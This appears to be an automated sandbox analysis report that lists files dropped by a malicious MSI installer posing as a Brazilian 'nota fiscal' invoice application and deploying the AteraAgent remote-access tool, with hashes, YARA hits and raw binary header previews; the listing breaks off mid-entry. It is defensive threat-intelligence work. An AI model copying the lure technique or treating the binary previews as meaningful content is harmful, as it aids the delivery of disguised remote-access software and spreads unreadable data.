                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5885.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5885.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5885.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI9409.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSIA7C1.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):435986
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.651592121918403
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:yt3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4Kse:azOE2Z34KGzOE2Z34K5
                                                                                                                                                                                                                                                                                              MD5:8D37E25AA290892BCEC416FF291B44D2
                                                                                                                                                                                                                                                                                              SHA1:AEF13D6214D2687D983D219CE4E53E5E38D7281B
                                                                                                                                                                                                                                                                                              SHA-256:CF98C4B9CF15A26C1F95211355096534133C6E8E6B74AE3D97DE9B449A2CEDE2
                                                                                                                                                                                                                                                                                              SHA-512:94776E1F82111A9D1F1C2CD39A848A12F60BB2956ABE28884DE3338CFE947C19747BC1FFDF57B87329D43DA452E7F9D6E3C58128BEE90EF70607990E168DC18C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIA7C1.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@r7&Z.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent".APLICATIVO-WINDOWS-NOTA-FISCAL.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}....&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}c.&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}............StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSIA8AC.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSIAC76.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSIADBF.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSICA70.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):437217
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.647841120583969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:Zt3jOZy2KsGU6a4Kspt3jOZy2KsGU6a4KsM:XzOE2Z34K+zOE2Z34KR
                                                                                                                                                                                                                                                                                              MD5:1DCCC5659F1BE31C4C2BB1196BDF3F1C
                                                                                                                                                                                                                                                                                              SHA1:646A4C4E2C0D7C7D16DA5375B6A489A078B4E28C
                                                                                                                                                                                                                                                                                              SHA-256:59EF7CC6BD54579FF5B65707EBFD69F7662A515D867A2C1FB5FC42F95F43F92F
                                                                                                                                                                                                                                                                                              SHA-512:D5AE408EE6D2A1A9AA438CB89671D2196705D147A61F26ED489117AEC5B43C041C6F720A2757A9C687798743A5A70DB88DEBFDDD7E9555952AED54E1996BC8E8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSICA70.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@w7&Z.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[....

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSICA80.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSICB4C.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSICBAB.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
